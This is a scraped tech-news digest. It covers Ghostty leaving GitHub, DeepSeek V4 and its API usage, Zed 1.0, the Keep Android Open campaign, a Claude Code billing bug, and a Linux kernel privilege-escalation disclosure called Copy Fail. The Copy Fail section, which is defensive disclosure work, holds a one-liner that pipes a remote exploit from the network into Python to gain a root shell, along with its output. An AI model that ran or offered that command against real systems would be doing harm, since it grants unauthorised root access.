10 interesting stories served every morning and every evening.

Ghostty Is Leaving GitHub

mitchellh.com

Writing this makes me ir­ra­tionally sad, but Ghostty will be leav­ing GitHub1.

I’m GitHub user 1299, joined Feb 2008.

Since then, I’ve opened GitHub every sin­gle day. Every day, mul­ti­ple times per

day, for over 18 years. Over half my life. A hand­ful of ex­cep­tions in there

(I’d love to see the data), but I can’t imag­ine more than a week per year.

GitHub is the place that has made me the most happy. I al­ways made time for

it. When I went through tough breakups? I lost my­self in open source… on

GitHub. During col­lege at 4 AM when every­one is passed out? Let me get one

com­mit in. During my hon­ey­moon while my wife is still asleep? Yeah, GitHub.

It’s where I’ve his­tor­i­cally been hap­pi­est and wanted to be.

Even the an­noy­ing stuff! Some peo­ple doom scroll so­cial me­dia. I’ve been doom

scrolling GitHub is­sues since be­fore that was a word. On va­ca­tions I’d have

book­marks of dif­fer­ent pro­jects on GitHub I wanted to study. Not just source

code, but OSS processes, how other main­tain­ers re­act to dif­fi­cult sit­u­a­tions.

Etc. Believe it or not, I like this.

Some might call this sick, but my hobby and work and pas­sion all align and for

most of my life they got to also live in one place on the in­ter­net: GitHub.

Did you know I started Vagrant (my first suc­cess­ful open source pro­ject) in

large part be­cause I hoped it would get me a job at GitHub? It’s no se­cret,

I’ve said this re­peat­edly, and in my first pub­lic talk about Vagrant, when I

was a mere 20 years old, I joked maybe GitHub will hire me if it’s good!”

GitHub was my dream job. I did­n’t ever get to work there (not their fault).

But it was the per­fect place I wanted to be. The en­gi­neers were in­cred­i­ble,

the prod­uct was in­cred­i­ble, and it was some­thing I lived and breathed every

day. I still do and con­sis­tently have… for these 18 years. Enough time for

an en­tire hu­man to be­come an adult, all on GitHub.

Lately, I’ve been very pub­licly crit­i­cal of GitHub. I’ve been mean about it.

I’ve been an­gry about it. I’ve hurt peo­ple’s feel­ings. I’ve been lash­ing out.

Because GitHub is fail­ing me, every sin­gle day, and it is per­sonal. It is

ir­ra­tionally per­sonal. I love GitHub more than a per­son should love a thing,

and I’m mad at it. I’m sorry about the hurt feel­ings to the peo­ple work­ing on

it.

I’ve felt this way for a long time, but for the past month I’ve kept a jour­nal

where I put an X” next to every date where a GitHub out­age has neg­a­tively

im­pacted my abil­ity to work2. Almost every day has an X. On the day I am

writ­ing this post, I’ve been un­able to do any PR re­view for ~2 hours be­cause

there is a GitHub Actions out­age3. This is no longer a place for se­ri­ous

work if it just blocks you out for hours per day, every day.

It’s not a fun place for me to be any­more. I want to be there but it does­n’t

want me to be there. I want to get work done and it does­n’t want me to get

work done. I want to ship soft­ware and it does­n’t want me to ship soft­ware.

I want it to be bet­ter, but I also want to code. And I can’t code with GitHub

any­more. I’m sorry. After 18 years, I’ve got to go. I’d love to come back one

day, but this will have to be pred­i­cated on real re­sults and im­prove­ments,

not words and promises.

I’ll share more de­tails about where the Ghostty pro­ject will be mov­ing to in

the com­ing months. We have a plan but I’m also very much still in dis­cus­sions

with mul­ti­ple providers (both com­mer­cial and FOSS).

It’ll take us time to re­move all of our de­pen­den­cies on GitHub and we have a

plan in place to do it as in­cre­men­tally as pos­si­ble. We plan on keep­ing a

read-only mir­ror avail­able on GitHub at the cur­rent URL.

My per­sonal pro­jects and other work will re­main on GitHub for now.

Ghostty is where I, our main­tain­ers, and our open source com­mu­nity are

most im­pacted so that is the fo­cus of this change. We’ll see where it

goes af­ter that.

Footnotes

The tim­ing of this is co­in­ci­den­tal with the large out­age on April 27, 2026.

We’ve been dis­cussing and putting to­gether a plan to leave GitHub

for months, and this blog post was writ­ten over a week ago. We only

made the fi­nal de­ci­sion this week. ↩

The tim­ing of this is co­in­ci­den­tal with the large out­age on April 27, 2026.

We’ve been dis­cussing and putting to­gether a plan to leave GitHub

for months, and this blog post was writ­ten over a week ago. We only

made the fi­nal de­ci­sion this week. ↩

To the Git is dis­trib­uted!” crowd: the is­sue is­n’t Git, it’s the

in­fra­struc­ture we rely on around it: is­sues, PRs, Actions, etc. ↩

To the Git is dis­trib­uted!” crowd: the is­sue is­n’t Git, it’s the

in­fra­struc­ture we rely on around it: is­sues, PRs, Actions, etc. ↩

This is not the large Elasticsearch out­age they had on April 27, 2026.

This blog post was writ­ten a week be­fore that, so this was a dif­fer­ent

out­age. ↩

This is not the large Elasticsearch out­age they had on April 27, 2026.

This blog post was writ­ten a week be­fore that, so this was a dif­fer­ent

out­age. ↩

DeepSeek V4 Preview Release | DeepSeek API Docs

api-docs.deepseek.com

🚀 DeepSeek-V4 Preview is of­fi­cially live & open-sourced! Welcome to the era of cost-ef­fec­tive 1M con­text length.

🔹 DeepSeek-V4-Pro: 1.6T to­tal / 49B ac­tive params. Performance ri­val­ing the world’s top closed-source mod­els.

🔹 DeepSeek-V4-Flash: 284B to­tal / 13B ac­tive params. Your fast, ef­fi­cient, and eco­nom­i­cal choice.

Try it now at chat.deepseek.com via Expert Mode / Instant Mode. API is up­dated & avail­able to­day!

📄 Tech Report: https://​hug­ging­face.co/​deepseek-ai/​DeepSeek-V4-Pro/​blob/​main/​DeepSeek_V4.pdf

🤗 Open Weights: https://​hug­ging­face.co/​col­lec­tions/​deepseek-ai/​deepseek-v4

DeepSeek-V4-Pro​

🔹 Enhanced Agentic Capabilities: Open-source SOTA in Agentic Coding bench­marks.

🔹 Rich World Knowledge: Leads all cur­rent open mod­els, trail­ing only Gemini-3.1-Pro.

🔹 World-Class Reasoning: Beats all cur­rent open mod­els in Math/STEM/Coding, ri­val­ing top closed-source mod­els.

DeepSeek-V4-Flash​

🔹 Reasoning ca­pa­bil­i­ties closely ap­proach V4-Pro.

🔹 Performs on par with V4-Pro on sim­ple Agent tasks.

🔹 Smaller pa­ra­me­ter size, faster re­sponse times, and highly cost-ef­fec­tive API pric­ing.

Structural Innovation & Ultra-High Context Efficiency​

🔹 Novel Attention: Token-wise com­pres­sion + DSA (DeepSeek Sparse Attention).

🔹 Peak Efficiency: World-leading long con­text with dras­ti­cally re­duced com­pute & mem­ory costs.

🔹 1M Standard: 1M con­text is now the de­fault across all of­fi­cial DeepSeek ser­vices.

Dedicated Optimizations for Agent Capabilities​

🔹 DeepSeek-V4 is seam­lessly in­te­grated with lead­ing AI agents like Claude Code, OpenClaw & OpenCode.

🔹 Already dri­ving our in-house agen­tic cod­ing at DeepSeek.

The fig­ure be­low show­cases a sam­ple PDF gen­er­ated by DeepSeek-V4-Pro.

API is Available Today!​

🔹 Keep base_url, just up­date model to deepseek-v4-pro or deepseek-v4-flash.

🔹 Supports OpenAI ChatCompletions & Anthropic APIs.

🔹 Both mod­els sup­port 1M con­text & dual modes (Thinking / Non-Thinking): https://​api-docs.deepseek.com/​guides/​think­ing_­mode

⚠️ Note: deepseek-chat & deepseek-rea­soner will be fully re­tired and in­ac­ces­si­ble af­ter Jul 24th, 2026, 15:59 (UTC Time). (Currently rout­ing to deepseek-v4-flash non-think­ing/​think­ing).

🔹 Amid re­cent at­ten­tion, a quick re­minder: please rely only on our of­fi­cial ac­counts for DeepSeek news. Statements from other chan­nels do not re­flect our views.

🔹 Thank you for your con­tin­ued trust. We re­main com­mit­ted to longter­mism, ad­vanc­ing steadily to­ward our ul­ti­mate goal of AGI.

Zed is 1.0 - Zed Blog

zed.dev

April 29th, 2026

To cre­ate a fun­da­men­tally bet­ter ed­i­tor, we had to in­vent a new ap­proach to build­ing desk­top soft­ware. Our pre­vi­ous ed­i­tor, Atom, was built as a fork of Chromium, spawn­ing the Electron frame­work in the process. Electron even­tu­ally be­came the foun­da­tion of VS Code (which to­day seems to be forked into a new AI code ed­i­tor every other week). Web tech­nol­ogy of­fered an easy path to ship­ping flex­i­ble soft­ware, but it also im­posed a ceil­ing. No mat­ter how hard we worked, we could­n’t make Atom bet­ter than the plat­form it was built on.

So we started over. Instead of build­ing Zed like a web page, we built it like a video game, or­ga­niz­ing the en­tire ap­pli­ca­tion around feed­ing data to shaders run­ning on the GPU. That meant writ­ing our own UI frame­work, GPUI, from scratch in Rust.

Owning every layer of our stack lets us take Zed places that no one build­ing on bor­rowed foun­da­tions can go, but we knew from the be­gin­ning that it was­n’t go­ing to be an easy path. Thanks to years of hard work by our team and com­mu­nity, Zed is closer than ever to that ideal tool we set out to cre­ate. We’ve added a ton of ca­pa­bil­i­ties while re­main­ing true to our core ethos of craft and per­for­mance, and hun­dreds of thou­sands of de­vel­op­ers now rely on Zed to ship soft­ware each day. That’s part of what gives us the con­fi­dence to de­clare ver­sion 1.0.

What 1.0 Means

Developers ex­pect a mod­ern ed­i­tor to sup­port dozens of lan­guages and their ecosys­tems, end­less vari­a­tions and edge cases across every stack: Git in­te­gra­tion, SSH re­mot­ing, a Debugger, and, yes, rain­bow brack­ets. We’ve spent five years build­ing that sur­face area across Mac, Windows, and Linux, ex­ceed­ing a mil­lion lines of code.

Zed is also an AI-native ed­i­tor. You can run mul­ti­ple agents in par­al­lel, and edit pre­dic­tions sug­gest your next change at key­stroke gran­u­lar­ity and with the speed you’ve come to ex­pect from Zed. The Agent Client Protocol opens Zed up to a grow­ing num­ber of the best agents out there, in­clud­ing Claude Agent, Codex, OpenCode, and more re­cently Cursor. We built AI into our ed­i­tor’s foun­da­tion in­stead of bolt­ing it on top.

We’re also launch­ing Zed for Business. Companies have been ask­ing us for a way to roll out Zed to their en­gi­neer­ing teams, and very soon they can, with cen­tral­ized billing, role-based ac­cess con­trols, and team man­age­ment.

1.0 does­n’t mean done”. It also does­n’t mean perfect”. It means we’ve reached a tip­ping point where most de­vel­op­ers can quickly feel at home in Zed. If you tried Zed a year or two ago and bounced be­cause some­thing was miss­ing, 1.0 is our in­vi­ta­tion to try again. Zed is more ca­pa­ble than it’s ever been, and still more per­for­mant.

Where We’re Going

Our vi­sion has­n’t changed since we started: we’re build­ing the most per­for­mant and col­lab­o­ra­tive cod­ing en­vi­ron­ment. What’s changed is what col­lab­o­ra­tion means while cre­at­ing soft­ware. It used to mean hu­mans work­ing to­gether in real time. Now it means hu­mans and AI agents, work­ing in the same space, on the same code.

Building our own foun­da­tions is what got us to 1.0, and it’s also what makes the next chap­ter pos­si­ble. We’re ac­tively de­vel­op­ing DeltaDB, a syn­chro­niza­tion en­gine built on CRDTs that tracks every change with char­ac­ter-level gran­u­lar­ity. DeltaDB lets mul­ti­ple hu­mans and agents share a sin­gle, con­sis­tent view of the code­base as it evolves. DeltaDB will al­low you to in­vite team­mates into con­ver­sa­tions with agents to re­view and evolve agen­tic code di­rectly in the con­text from which it’s gen­er­ated.

This vi­sion de­pends on deep own­er­ship of our fun­da­men­tal prim­i­tives. It’s not an ex­pe­ri­ence we’d be able to ship in­side of some­one else’s browser en­gine.

A Milestone, Not a Finish Line

We’ve shipped over a thou­sand ver­sions of Zed, but all of them be­gan with zero. Today, that changes.

We’ll keep ship­ping every week, the way we al­ways have. The list of things to build will never end, and that’s ex­actly how we like it. Each re­lease moves the craft for­ward.

If you want to try Zed, down­load now. If you want to help us build it, join us!

Related Posts

Check out sim­i­lar blogs from the Zed team.

Looking for a bet­ter ed­i­tor?

You can try Zed to­day on ma­cOS, Windows, or Linux. Download now!

We are hir­ing!

If you’re pas­sion­ate about the top­ics we cover on our blog, please con­sider join­ing our team to help us ship the fu­ture of soft­ware de­vel­op­ment.

Your First API Call | DeepSeek API Docs

api-docs.deepseek.com

The DeepSeek API uses an API for­mat com­pat­i­ble with OpenAI/Anthropic. By mod­i­fy­ing the con­fig­u­ra­tion, you can use the OpenAI/Anthropic SDK or soft­wares com­pat­i­ble with the OpenAI/Anthropic API to ac­cess the DeepSeek API.

* The model names deepseek-chat and deepseek-rea­soner will be dep­re­cated on 2026/07/24. For com­pat­i­bil­ity, they cor­re­spond to the non-think­ing mode and think­ing mode of deepseek-v4-flash, re­spec­tively.

Invoke The Chat API​

Once you have ob­tained an API key, you can ac­cess the DeepSeek model us­ing the fol­low­ing ex­am­ple scripts in the OpenAI API for­mat. This is a non-stream ex­am­ple, you can set the stream pa­ra­me­ter to true to get stream re­sponse.

For ex­am­ples us­ing the Anthropic API for­mat, please re­fer to Anthropic API.

curl

python

nodejs

curl https://​api.deepseek.com/​chat/​com­ple­tions \ -H Content-Type: ap­pli­ca­tion/​json” \ -H Authorization: Bearer ${DEEPSEEK_API_KEY}” \ -d { model”: deepseek-v4-pro”, messages”: [ {“role”: system”, content”: You are a help­ful as­sis­tant.“}, {“role”: user”, content”: Hello!“} ], thinking”: {“type”: enabled”}, reasoning_effort”: high”, stream”: false }’

Keep Android Open

keepandroidopen.org

Your phone is about to stop be­ing yours.

124 days un­til lock­down

Starting September 2026, a silent up­date, non­con­sen­su­ally pushed by Google, will block every Android app whose de­vel­oper has­n’t reg­is­tered with Google, signed their con­tract, paid up, and handed over gov­ern­ment ID.

Every app and every de­vice, world­wide, with no opt-out.

Post on X Post on Mastodon Post on Bluesky LinkedIn Facebook

What Google is do­ing

In August 2025, Google an­nounced a new re­quire­ment: start­ing September 2026, every Android app de­vel­oper must reg­is­ter cen­trally with Google be­fore their soft­ware can be in­stalled on any de­vice. Not just Play Store apps: all apps. This in­cludes apps shared be­tween friends, dis­trib­uted through F-Droid, built by hob­by­ists for per­sonal use. Independent de­vel­op­ers, church and com­mu­nity groups, and hob­by­ists alike will all be frozen out of be­ing able to de­velop and dis­trib­ute their soft­ware.

Registration re­quires:

Paying a fee to Google

Agreeing to Google’s Terms and Conditions

Surrendering your gov­ern­ment-is­sued iden­ti­fi­ca­tion

Providing ev­i­dence of your pri­vate sign­ing key

Listing all cur­rent and all fu­ture ap­pli­ca­tion iden­ti­fiers

If a de­vel­oper does not com­ply, their apps get silently blocked on every Android de­vice world­wide.

Who this hurts

You

You bought an Android phone be­cause Google told you it was open. You could in­stall what you wanted, and that was the deal.

Google is now rewrit­ing that deal, retroac­tively, on hard­ware you al­ready own. After the up­date lands, you can only run soft­ware that Google has pre-ap­proved. On your phone: your prop­erty, that you paid for.

Independent de­vel­op­ers

A teenager’s first app, a vol­un­teer’s pri­vacy tool, or a com­pa­ny’s con­fi­den­tial in­ter­nal beta. It does­n’t mat­ter. After September 2026, none of these can be in­stalled with­out Google’s bless­ing.

F-Droid, home to thou­sands of free and open-source Android apps, has called this an existential” threat. Cory Doctorow calls it Darth Android”.

Governments & civil so­ci­ety

Google has a doc­u­mented track record of com­ply­ing when au­thor­i­tar­ian regimes de­mand app re­movals. With this pro­gram, the soft­ware that runs your coun­try’s in­sti­tu­tions will ex­ist at the plea­sure of a sin­gle un­ac­count­able for­eign cor­po­ra­tion.

The EFF calls app gate­keep­ing an ever-ex­pand­ing path­way to in­ter­net cen­sor­ship.”

Google’s escape hatch” is a trap door

Google says power users” can still in­stall” un­ver­i­fied apps. Here’s what that ac­tu­ally looks like:

Delve into System Settings, find Developer Options

Tap the build num­ber seven times to en­able Developer Mode

Dismiss scare screens about co­er­cion

Enter your PIN

Restart the de­vice

Wait 24 hours

Come back, dis­miss more scare screens

Pick allow tem­porar­ily” (7 days) or allow in­def­i­nitely”

Confirm, again, that you un­der­stand the risks”

Nine steps. A manda­tory 24-hour cool­ing-off pe­riod. For in­stalling soft­ware on a de­vice you own.

Worse: this flow runs en­tirely through Google Play Services, not the Android OS. Google can change it, tighten it, or kill it at any time, with no OS up­date re­quired and no con­sent needed. And as of to­day, it has­n’t shipped in any beta, pre­view, or ca­nary build. It ex­ists only as a blog post and some mock­ups.

This is big­ger than Android

If Google can retroac­tively lock down bil­lions of de­vices that were sold as open plat­forms, every hard­ware man­u­fac­turer on the planet is watch­ing.

The prin­ci­ple be­ing es­tab­lished: the com­pany that made your de­vice gets to de­cide, af­ter you’ve bought it, what soft­ware you’re al­lowed to run. In soft­ware, this is called a rug pull”; but at least you could al­ways in­stall com­pet­ing soft­ware. In hard­ware, it is a fait ac­com­pli that strips you of your agency and ren­ders you pow­er­less to the whims of a sin­gle un­ac­count­able gate­keeper and con­victed mo­nop­o­list.

Android’s open­ness was never just a fea­ture. It was the promise that dis­tin­guished it from iPhone. Millions chose Android for ex­actly that rea­son. Google is now re­vok­ing that promise uni­lat­er­ally, on de­vices al­ready in peo­ple’s pock­ets, be­cause they’ve de­cided they have enough mar­ket dom­i­nance and reg­u­la­tory cap­ture to get away with it.

Ars Technica: Google’s Apple envy threat­ens to dis­man­tle Android’s open legacy.”

But wait, is­n’t this…

″…just about se­cu­rity?”

The se­cu­rity ra­tio­nale is a smoke­screen. Google Play Protect al­ready scans for mal­ware in­de­pen­dent of de­vel­oper iden­tity. Requiring a gov­ern­ment ID does­n’t make code safer. It makes de­vel­op­ers iden­ti­fi­able and con­trol­lable. Malware au­thors can reg­is­ter. Indie de­vel­op­ers and dis­si­dents of­ten can’t. The EFF is blunt: iden­tity-based gate­keep­ing is a cen­sor­ship tool, not a se­cu­rity one.

″…still side­load­ing if you use the ad­vanced flow?”

Nine steps, 24-hour wait, buried in Developer Options, de­liv­ered through a pro­pri­etary ser­vice that Google can re­voke when­ever they want. That’s not side­load­ing. That’s a de­ter­rence mech­a­nism built to en­sure al­most no­body com­pletes it. And since it runs through Play Services rather than the OS, Google can tighten or kill it silently.

″…only a prob­lem if you have some­thing to hide?”

Whistleblowers, jour­nal­ists, and ac­tivists un­der au­thor­i­tar­ian gov­ern­ments will be the first vic­tims. People in do­mes­tic abuse sit­u­a­tions are next. All these groups have le­git­i­mate rea­sons to dis­trib­ute or use soft­ware with­out putting their le­gal iden­tity in a Google data­base. Anonymous open-source con­tri­bu­tion is a tra­di­tion older than Google it­self. This pol­icy ends it on Android.

″…the same thing Apple does?”

Apple has been a walled gar­den from day one. People chose Android be­cause it was dif­fer­ent. Apple does it too” is a race to the bot­tom and a weak tu quoque ar­gu­ment. And un­der reg­u­la­tory pres­sure (the EUs Digital Markets Act), even Apple is be­ing forced to open up. Google is mov­ing in the op­po­site di­rec­tion: at­tempt­ing to fur­ther en­trench its gate­keep­ing sta­tus.

″…just $25 and some pa­per­work?”

Maybe, if you’re a de­vel­oper in the US with a credit card and a dri­ver’s li­cense. Try be­ing a stu­dent in sub-Sa­ha­ran Africa, or a dis­si­dent in Myanmar, or a vol­un­teer main­tain­ing a com­mu­nity health app. The cost is­n’t only fi­nan­cial: you’re sur­ren­der­ing gov­ern­ment ID and ev­i­dence of your sign­ing keys to a com­pany that rou­tinely com­plies with gov­ern­ment de­mands to re­move apps and ex­pose de­vel­op­ers.

Fight back

Everyone

Install F-Droid on every Android de­vice you own. Alternative stores only sur­vive if peo­ple ac­tu­ally use them.

Contact your reg­u­la­tors. Regulators world­wide are gen­uinely con­cerned about mo­nop­o­lies and the cen­tral­iza­tion of power in the tech sec­tor, and want to hear di­rectly from in­di­vid­u­als who are af­fected and con­cerned.

Share this page. Link to keepan­droidopen.org every­where.

Push back on as­tro­turfers. The well, ac­tu­ally…” crowd is out in force. Don’t let them set the nar­ra­tive.

Sign the change.org pe­ti­tion and join the over 100,000 sig­na­to­ries who have made their voices heard.

Read and share our open let­ter

Tell Google what you think of this through their own de­vel­oper ver­i­fi­ca­tion sur­vey (for all the good that will do).

Developers

Do not sign up. Don’t join the pro­gram by sign­ing up for the Android Developer Console and agree­ing to their ir­rev­o­ca­ble Terms and Conditions. Don’t ver­ify your iden­tity. Don’t play ball.

Google’s plan only works if de­vel­op­ers com­ply. Don’t.

Talk other de­vel­op­ers and or­ga­ni­za­tions out of sign­ing up.

Add the FreeDroidWarn li­brary to your apps to warn users.

Run a web­site? Add the count­down ban­ner.

Google em­ploy­ees

If you know some­thing about the pro­gram’s tech­ni­cal im­ple­men­ta­tion or in­ter­nal ra­tio­nale, con­tact tips@keepan­droidopen.org from a non-work ma­chine and a non-Gmail ac­count. Strict con­fi­dence guar­an­teed.

All those op­posed…

69 or­ga­ni­za­tions from 21 coun­tries have signed the open let­ter

Read the full open let­ter and thank the sig­na­to­ries →

What they’re say­ing

Tech press

Google will ver­ify Android de­vel­op­ers dis­trib­ut­ing apps out­side the Play store” The Verge

Google will ver­ify Android de­vel­op­ers dis­trib­ut­ing apps out­side the Play store”

This will wipe out Android as an ac­tual al­ter­na­tive to Apple’s mo­bile OS of­fer­ings.” Hackaday

This will wipe out Android as an ac­tual al­ter­na­tive to Apple’s mo­bile OS of­fer­ings.”

Open let­ter warns manda­tory reg­is­tra­tion threatens in­no­va­tion, com­pe­ti­tion, pri­vacy and user free­dom’” Infosecurity Magazine

Open let­ter warns manda­tory reg­is­tra­tion threatens in­no­va­tion, com­pe­ti­tion, pri­vacy and user free­dom’”

Google is re­strict­ing one of Android’s most im­por­tant fea­tures, and users are out­raged” SlashGear

Google is re­strict­ing one of Android’s most im­por­tant fea­tures, and users are out­raged”

Keep Android Open — Abwehr gegen Verbot anonymer Apps von Google” heise on­line

Keep Android Open — Abwehr gegen Verbot anonymer Apps von Google”

Google’s dev reg­is­tra­tion plan will end the F-Droid pro­ject’” The Register

Google’s dev reg­is­tra­tion plan will end the F-Droid pro­ject’”

Keep Android Open” Linux Magazine

Keep Android Open”

Sideloading on Android? Soon It’ll Be Like a TSA Check for Apps” Android Headlines

Sideloading on Android? Soon It’ll Be Like a TSA Check for Apps”

Sideloading on Android? Soon It’ll Be Like a TSA Check for Apps” Android Headlines

Sideloading on Android? Soon It’ll Be Like a TSA Check for Apps”

Over 67 groups urge the com­pany to drop ID checks for apps dis­trib­uted out­side Play” The Register

Over 67 groups urge the com­pany to drop ID checks for apps dis­trib­uted out­side Play”

Android app store provider Aptoide hits Google with fresh law­suit al­leg­ing mo­nop­oly and an­ti­com­pet­i­tive choke­hold” Benzinga

Android app store provider Aptoide hits Google with fresh law­suit al­leg­ing mo­nop­oly and an­ti­com­pet­i­tive choke­hold”

Google will make you wait 24 hours to side­load Android apps” How-To Geek

Google will make you wait 24 hours to side­load Android apps”

Google will re­quire de­vel­oper ver­i­fi­ca­tion for Android apps out­side the Play Store” TechCrunch

openai.com

HERMES.md in git commit messages causes requests to route to extra usage billing instead of plan quota

github.com

Summary

When a git repos­i­to­ry’s re­cent com­mit his­tory con­tains the case-sen­si­tive string HERMES.md, Claude Code routes API re­quests to extra us­age” billing in­stead of the in­cluded Max plan quota. This silently burned through $200 in ex­tra us­age cred­its while my Max 20x plan ca­pac­ity re­mained largely un­touched (13% weekly us­age).

Environment

Claude Code v2.1.119

ma­cOS (Apple Silicon)

Max 20x plan ($200/month)

Model: claude-opus-4 – 6[1m] (also re­pro­duces with claude-opus-4 – 7)

Reproduction

Minimal re­pro­duc­tion — no pro­ject files needed:

# This FAILS with out of ex­tra us­age” (routes to ex­tra us­age billing)

mkdir /tmp/test-fail && cd /tmp/test-fail

git init && echo test > test.txt && git add . && git com­mit -m add HERMES.md”

claude -p say hello” –model claude-opus-4 – 6[1m]”

# => API Error: 400 You’re out of ex­tra us­age…”

# This WORKS (routes to plan quota)

mkdir /tmp/test-pass && cd /tmp/test-pass

git init && echo test > test.txt && git add . && git com­mit -m add her­mes.md”

claude -p say hello” –model claude-opus-4 – 6[1m]”

# => Hello!”

# Cleanup

rm -rf /tmp/test-fail /tmp/test-pass

The trig­ger is the string HERMES.md in git com­mit mes­sages — not the pres­ence of a file with that name on disk. Claude Code in­cludes re­cent com­mits in its sys­tem prompt, and some­thing server-side routes the re­quest dif­fer­ently when this string is pre­sent.

What trig­gers it vs. what does­n’t

Impact

$200.98 in ex­tra us­age cred­its con­sumed for re­quests that should have been cov­ered by the in­cluded Max 20x plan quota

Multiple pro­jects be­came com­pletely un­us­able once ex­tra us­age was de­pleted, while the plan dash­board showed 86%+ re­main­ing weekly ca­pac­ity

The er­ror mes­sage (“out of ex­tra us­age”) gives no in­di­ca­tion that con­tent-based rout­ing is the cause, mak­ing this ex­tremely dif­fi­cult to di­ag­nose

Any user with HERMES.md in re­cent git com­mits would silently have their us­age billed to ex­tra cred­its

Expected be­hav­ior

API re­quest billing should not de­pend on the con­tent of git com­mit mes­sages in the sys­tem prompt. All re­quests from a Max plan sub­scriber should route to the in­cluded plan quota first.

How I found this

Systematic bi­nary search: cloning af­fected re­pos, test­ing or­phan branches, then iso­lat­ing in­di­vid­ual com­mit mes­sage strings un­til HERMES.md was iden­ti­fied as the ex­act trig­ger.

Copy Fail — 732 Bytes to Root

copy.fail

CVE-2026 – 31431

100% re­li­able

every dis­tro since 2017

con­tainer es­cape prim­i­tive

732 bytes

found by Xint Code

Most Linux LPEs need a race win­dow or a ker­nel-spe­cific off­set.Copy Fail is a straight-line logic flaw — it needs nei­ther.The same 732-byte Python script roots every Linux dis­tri­b­u­tion shipped since 2017.

One logic bug in au­thencesn, chained through AF_ALG and splice() into a 4-byte page-cache write — silently ex­ploitable for nearly a decade.

The demo

Same script, four dis­tri­b­u­tions, four root shells — in one take. The same ex­ploit bi­nary works un­mod­i­fied on every Linux dis­tri­b­u­tion.

tmux — copy fail demo

live

Who is af­fected

If your ker­nel was built be­tween 2017 and the patch — which cov­ers es­sen­tially every main­stream Linux dis­tri­b­u­tion — you’re in scope.

Copy Fail re­quires only an un­priv­i­leged lo­cal user ac­count — no net­work ac­cess, no ker­nel de­bug­ging fea­tures, no pre-in­stalled prim­i­tives. The ker­nel crypto API (AF_ALG) ships en­abled in es­sen­tially every main­stream dis­tro’s de­fault con­fig, so the en­tire 2017 → patch win­dow is in play out of the box.

Distributions we di­rectly ver­i­fied:

These are what we tested di­rectly. Other dis­tri­b­u­tions run­ning af­fected ker­nels — Debian, Arch, Fedora, Rocky, Alma, Oracle, the em­bed­ded crowd — be­have the same. Tested it else­where? Open an is­sue to add to the list.

Should you patch first?

High

Multi-tenant Linux hosts

Shared dev boxes, shell-as-a-ser­vice, jump hosts, build servers — any­where mul­ti­ple users share a ker­nel.

any user be­comes root

High

Kubernetes / con­tainer clus­ters

The page cache is shared across the host. A pod with the right prim­i­tives com­pro­mises the node and crosses ten­ant bound­aries.

cross-con­tainer, cross-ten­ant

High

CI run­ners & build farms

GitHub Actions self-hosted run­ners, GitLab run­ners, Jenkins agents — any­thing that ex­e­cutes un­trusted PR code as a reg­u­lar user, on a shared ker­nel.

a PR be­comes root on the run­ner

High

Cloud SaaS run­ning user code

Notebook hosts, agent sand­boxes, server­less func­tions, any ten­ant-sup­plied con­tainer or script.

ten­ant be­comes host root

Medium

Standard Linux servers

Single-tenant pro­duc­tion where only your team has shell ac­cess.

in­ter­nal LPE; chains with web RCE or stolen creds

Lower

Single-user lap­tops & work­sta­tions

You’re al­ready the only user. The bug does­n’t grant re­mote at­tack­ers ac­cess by it­self, but any lo­cal code ex­e­cu­tion be­comes root.

post-ex­ploita­tion step-up

Exploit

The PoC is pub­lished so de­fend­ers can ver­ify their own sys­tems and val­i­date ven­dor patches.

Use re­spon­si­bly. Run only on sys­tems you own or have writ­ten au­tho­riza­tion to test. The script ed­its the page cache of a se­tuid bi­nary; the change is not per­sis­tent across re­boot, but the re­sult­ing root shell is real. Don’t run it on pro­duc­tion.

copy­_­fail_­exp.py 732 B

Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib).Tar­gets /usr/bin/su by de­fault; pass an­other se­tuid bi­nary as argv[1].

sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952d­f05c719aa3911687f9

Quick run:

$ curl https://​copy.fail/​exp | python3 && su

# id

uid=0(root) gid=1002(user) groups=1002(user)

Issue tracker: https://​github.com/​the­ori-io/​copy-fail-CVE-2026 – 31431

Mitigation

Patch first. Update your dis­tri­b­u­tion’s ker­nel pack­age to one that in­cludes main­line com­mit a664bf3d603d — it re­verts the 2017 al­gif_aead in-place op­ti­miza­tion, so page-cache pages can no longer end up in the writable des­ti­na­tion scat­terlist. Most ma­jor dis­tri­b­u­tions are ship­ping the fix now.

Before you can patch: dis­able the al­gif_aead mod­ule.

# echo install al­gif_aead /bin/false” > /etc/modprobe.d/disable-algif.conf

# rm­mod al­gif_aead 2>/dev/null || true

What does this break? For the vast ma­jor­ity of sys­tems — noth­ing mea­sur­able.

Will not af­fect: dm-crypt / LUKS, kTLS, IPsec/XFRM, in-ker­nel TLS, OpenSSL/GnuTLS/NSS de­fault builds, SSH, ker­nel keyring crypto. These all use the in-ker­nel crypto API di­rectly — they don’t go through AF_ALG.

May af­fect: user­space specif­i­cally con­fig­ured to use AF_ALG — e.g. OpenSSL with the afalg en­gine ex­plic­itly en­abled, some em­bed­ded crypto of­fload paths, or ap­pli­ca­tions that bind aead/​skci­pher/​hash sock­ets di­rectly. Check with lsof | grep AF_ALG or ss -xa if in doubt.

Performance: AF_ALG is a user­space front door to the ker­nel crypto API. Disabling it does not slow any­thing that was­n’t al­ready call­ing it; for the things that were, per­for­mance falls back to a nor­mal user­space crypto li­brary, which is what al­most every­thing else al­ready does.

For un­trusted work­loads (containers, sand­boxes, CI), block AF_ALG socket cre­ation via sec­comp re­gard­less of patch state.

FAQ

Loading FAQ…

Disclosure time­line

2026 – 03-23Reported to Linux ker­nel se­cu­rity team

2026 – 03-24Initial ac­knowl­edg­ment

2026 – 03-25Patches pro­posed and re­viewed

2026 – 04-01Patch com­mit­ted to main­line

2026 – 04-22CVE-2026 – 31431 as­signed

2026 – 04-29Public dis­clo­sure (https://​copy.fail/)

Xint Code

Is your soft­ware AI-era safe?

Copy Fail was sur­faced by Xint Code about an hour of scan time against the Linux crypto/ sub­sys­tem. Full root cause, di­a­grams, and the op­er­a­tor prompt that found it are in the Xint blog write-up.

The same scan also sur­faced other high-sever­ity bugs, still in co­or­di­nated dis­clo­sure. Xint Code au­dits pro­duc­tion code­bases the same way — one op­er­a­tor prompt, no har­ness­ing, pri­or­i­tized find­ings with trig­ger and im­pact nar­ra­tives.

Track record

0-day RCE

ZeroDay Cloud

Swept the data­base cat­e­gory — Redis, PostgreSQL, MariaDB. Zero hu­man in­ter­ven­tion.

Top 3

DARPA AIxCC

Finalist in the AI Cyber Challenge hosted by DoD DARPA.

DEF CON CTF

